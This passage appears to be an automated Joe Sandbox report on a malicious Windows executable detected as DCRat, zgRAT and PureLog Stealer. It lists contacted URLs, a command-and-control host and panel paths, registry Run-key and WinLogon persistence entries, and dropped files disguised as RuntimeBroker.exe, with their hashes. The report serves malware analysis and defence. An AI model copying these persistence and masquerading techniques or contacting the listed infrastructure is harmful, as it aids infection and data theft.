                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.1808534246.000001DD00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24B128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000004.00000002.1808534246.000001DD00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24B128000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2672003595.000001DD10075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3162496814.0000016710076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3227843973.0000024D3A465000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3015277632.0000023D10076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3035136841.000001F25AF76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contoso.com/Iconpowershell.exe, 0000000D.00000002.3222131396.000001B8923C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000018.00000003.1841092822.000001CE0CEA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drfalse
                                                      		high
                                                      https://aka.ms/pscore68powershell.exe, 00000004.00000002.1808534246.000001DD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A3F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24AF01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameEQdhBjQw4G.exe, 00000000.00000002.1680880366.0000000003B7D000.00000004.00000800.00020000.00000000.sdmp, EQdhBjQw4G.exe, 00000000.00000002.1680880366.000000000355F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1808534246.000001DD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1815208929.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1834937845.0000024D2A3F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1815252219.0000023D00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1817388172.000001F24AF01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1823237770.000001B882351000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000018.00000003.1841092822.000001CE0CEC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.24.drfalse
                                                            		high
                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1823237770.000001B882577000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              37.44.238.250
                                                              		861848cm.nyashkoon.ruFrance
                                                              		49434HARMONYHOSTING-ASFRtrue

                                                              Private

                                                              IP
                                                              127.0.0.1

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1549799
                                                              Start date and time:2024-11-06 03:36:07 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 10m 3s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:41
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:EQdhBjQw4G.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:477DB3DE46B7779B63495A8BDB279F2C.exe
                                                              Detection:MAL
                                                              Classification:mal100.spre.troj.expl.evad.winEXE@49/56@1/2
                                                              EGA Information:
                                                              • Successful, ratio: 18.2%
                                                              HCA Information:Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target EQdhBjQw4G.exe, PID 2228 because it is empty
                                                              • Execution Graph export aborted for target EQdhBjQw4G.exe, PID 5264 because it is empty
                                                              • Execution Graph export aborted for target ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, PID 5052 because it is empty
                                                              • Execution Graph export aborted for target ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, PID 7140 because it is empty
                                                              • Execution Graph export aborted for target ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, PID 7924 because it is empty
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 1216 because it is empty
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 1376 because it is empty
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 7776 because it is empty
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 8180 because it is empty
                                                              • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              02:37:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJ "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:37:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                              02:37:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4G "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                              02:37:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJ "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:37:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                              02:37:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4G "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                              02:37:53AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJ "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:38:02AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                              02:38:10AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4G "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                              02:38:27AutostartRun: WinLogon Shell "C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:38:35AutostartRun: WinLogon Shell "C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:38:44AutostartRun: WinLogon Shell "C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\RuntimeBroker.exe"
                                                              02:38:52AutostartRun: WinLogon Shell "C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe"
                                                              02:39:00AutostartRun: WinLogon Shell "C:\Users\user\Desktop\EQdhBjQw4G.exe"
                                                              21:37:01API Interceptor158x Sleep call for process: powershell.exe modified
                                                              21:37:14API Interceptor2427562x Sleep call for process: ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe modified
                                                              21:37:15API Interceptor2x Sleep call for process: svchost.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37.44.238.2503AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                              HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                                              k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                              • 452132cm.n9shteam2.top/Processdownloads.php
                                                              FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 114936cm.nyashcrack.top/EternalHttpprocessauthdbwordpressUploads.php
                                                              cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • aidvwbpa.top/pipeprocessauthBigloadprotectlocal.php
                                                              qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • rollsroys.top/externaljsapisql.php
                                                              QDJA9geR12.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • merlion.top/PythongameTrafficDatalifepublic.php
                                                              Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 492668cm.newnyash.top/ToSecureLowProcessordefaultDatalifeCentral.php
                                                              T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 024171cm.newnyash.top/authgameapiserverlinuxTestcdnDownloads.php
                                                              bR9BxUAkJW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • nazvanie.top/ExternalVmPythonrequestsecurepacketBigloadlocalprivatetemporary.php

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              861848cm.nyashkoon.ru3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              HARMONYHOSTING-ASFR3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              HcEvQKWAu2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              k1iZHyRK6K.exeGet hashmaliciousDCRatBrowse
                                                              • 37.44.238.250
                                                              FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              QDJA9geR12.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              Q9AQFOA6YC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              bR9BxUAkJW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe3AAyq819Vy.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                    Created / dropped Files

                                                                    C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\9e8d7a4ca61bd9

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):216
                                                                    Entropy (8bit):5.781139434119925
                                                                    Encrypted:false
                                                                    SSDEEP:3:SpVv7TbzCnUG8z8WTAh8r3siPnjd9cOxDrd3TR8Y32xhIEykfsB2nTxZ16Ichqjz:SHvfCaQoE6ciPn59HdVKBS2TP16j9M
                                                                    MD5:091E2D132A36DFAD136E2246240E991E
                                                                    SHA1:FD3E4C842F8F7F58CD082FBBF56920EA1A9A3528
                                                                    SHA-256:A484D471C9F4CAF61438F9AF2D176B72B52A07D38F483F61859EED20BE93A63E
                                                                    SHA-512:67DE612EB0AAD50E8445401A174F0B30CD5A556F32F2984C02B70AE897966142EE10C211938DD8807D49495E6C402CC19CE02091BC5DC0E391DD6F0426429784
                                                                    Malicious:false
                                                                    Preview:ZHmoWOKJSWV8G3P8YLqnJB4pNbkTWorF1239Q4KrNBYTh2KUvK5KreDYN7a4o0wnpQGO9QreB8aHmlHVRPhLsgXXyfwTdPDWOuoQv5UfcaJtD5vlzFnYTl5I3tZddYAv4D3170jV5BsRXnT2tLeYmpCnzfXCf0CEaXz9C4o8fRcR2nuPZhuS3mJOBPBbchzE9n1AyT0zgf2UMuvMuIm8GuLx

                                                                    C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1719296
                                                                    Entropy (8bit):7.457136013265021
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                    SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                    SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                    SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                    • Antivirus: Virustotal, Detection: 53%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: 3AAyq819Vy.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                    C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                    Download File
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xc1c53458, page size 16384, DirtyShutdown, Windows version 10.0
                                                                    Category:dropped
                                                                    Size (bytes):1310720
                                                                    Entropy (8bit):0.4221483275284068
                                                                    Encrypted:false
                                                                    SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                                    MD5:1FA752C16A42294FA4514EBDCA321800
                                                                    SHA1:D55EAE16326163F0D3C1D43D2998B5C0EE09465C
                                                                    SHA-256:7C1460AD6EC0DBCA50E514162DDEE0EB0A3CC0384715303684683594E96504F5
                                                                    SHA-512:89D88B97CABD4F2138FD37605943F2862768AE3E461B02C4C0CC3829965461E939D0EE16D98FDC3CB06940114F9B62818C110E026886FD9968E0257E798D8E9B
                                                                    Malicious:false
                                                                    Preview:..4X... .......A.......X\...;...{......................0.!..........{A..%...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{....................................h..%...|..................T(+..%...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1719296
                                                                    Entropy (8bit):7.457136013265021
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                    SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                    SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                    SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                    • Antivirus: Virustotal, Detection: 53%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: 3AAyq819Vy.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                    C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Recovery\a4716c5db9108b

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:ASCII text, with very long lines (701), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):701
                                                                    Entropy (8bit):5.864523610592362
                                                                    Encrypted:false
                                                                    SSDEEP:12:RY5c/V/qsM2SyXf3T5QlXkq57CgbN64WYubNfewPFM/yJmRfdjrmD829IQw:TFjXf3NQh57CgbN6wgNPFqlf684IQw
                                                                    MD5:452B299D056BC2F20541E7BF45E98B67
                                                                    SHA1:44D8973B1647C99B9ECF6CBFFC5301F4394B581C
                                                                    SHA-256:84469FAAD56CE498FBECB3FD8011537E8863758A3A955E1CCBDF2821BF7B0171
                                                                    SHA-512:D28AD1297F85018DB7D64F1A5C98426AD4E21566862B0C3DA66F57E14E3EDCF5C7FF741AC9CC566D3619E0E58EEAD6A090F12D4DE2193E65E50C10B837E1E083
                                                                    Malicious:false
                                                                    Preview:wBLk5oX7fPHKJZfkhgi1X8Q41VDCfavvfZjnOvPJ99NXJRNoQaE3o9TyuQsklVbFeWot02VwRZ1Yv2ukHZwEV2GgFv27CpiohI3xmexYFRlPH4D2fHcMiXtmPInE9Xtm0N1m978nlY9DQ0ZKs9b5MVFJZQhd0tYrh9Y3Da2iIylJXpWYtcW96yZeHrMsZfx2ASfQcfHRH3wXu5wu4JtXWYvtk3vVNJJnBsJFJF6OVE2CCBuL5cyQvafmhwqitvD7tIWBwrkyMfCRfsqiJkavV22lNhhWZYejB5S3psZN2AEPYNGyFIYJVSl0PvyOJNYxBcQjZx2bKM2UynN9asQRAVOsTbo43KEolQN57gZSP68IZRCmiyya7HxqOhP7J8hAIOsiZRC3T8BDWFTCZBWFWnredhrZRcJRY89KieMQw4H8FtTIONhHlcnfhOE2jnm1yuoXGIe5zFSbfsZtNjLD4Cp6UemUZTqJRQJUF6BFslRfJM9zyVoAbi6wEsDlfKgfZJJPiEoRhFVSuKwIfxfDoqrtTWQW2akiFvGACuQuqXdWNoC465Grpc0sca5LyRYHfxN8DvGugvXRNUfpUVa7T22m4YhlyF5Z8V1ZaD0KyVL3FjfI4P0c0bxn4kEpOe6bz7T1dGORfQI7r9hV2ZqjOdihiOf09L5UZtEHQnoyAj7kSz55DswzxWNWZwTOk

                                                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\EQdhBjQw4G.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1719296
                                                                    Entropy (8bit):7.457136013265021
                                                                    Encrypted:false
                                                                    SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                    MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                    SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                    SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                    SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                    • Antivirus: Virustotal, Detection: 53%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: 3AAyq819Vy.exe, Detection: malicious, Browse
